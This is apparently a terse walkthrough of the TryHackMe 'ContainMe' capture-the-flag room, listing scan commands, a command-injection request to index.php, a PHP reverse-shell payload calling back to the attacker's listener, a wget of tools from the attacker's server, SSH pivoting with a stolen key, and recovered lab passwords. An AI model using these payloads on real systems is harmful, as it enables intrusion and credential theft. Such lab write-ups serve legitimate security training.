ContainMe
Room Link: https://tryhackme.com/room/containme1
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Burp Request
GET /index.php?path=;id HTTP/1.1
Host: 10.10.108.33
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Initial Shell
Kali
nc -lvnp 1337Burp Request
GET /index.php?path=;php+-r+'$sock%3dfsockopen("$KALI",1337)%3bexec("sh+<%263+>%263+2>%263")%3b' HTTP/1.1
Host: 10.10.128.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgVictim
find / -perm -u=s -type f 2> /dev/null
/usr/share/man/zh_TW/crypt mike
Kali
git clone https://github.com/andrew-d/static-binaries.git
cd static-binaries/binaries/linux/x86_64
python2 -m SimpleHTTPServer 81Victim
cd /tmp/
wget http://$KALI:81/nmap
chmod +x nmap
./nmap 172.16.20.0/24 -Pn
Mike has a ssh key so I tried logging into the other server with that and it worked.
Victim
ssh mike@172.16.20.6 -i /home/mike/.ssh/id_rsa
Privilege Escalation
Victim
ss -ltp 
Password was password, just guessed it.
Victim(mysql)
mysql -ppassword
show databases;
use accounts;
select * from users ;
Victim
su root
Password: bjsig4868fgjjeog
Victim
cd /root
unzip mike.zip
Password: WhatAreYouDoingHereLast updated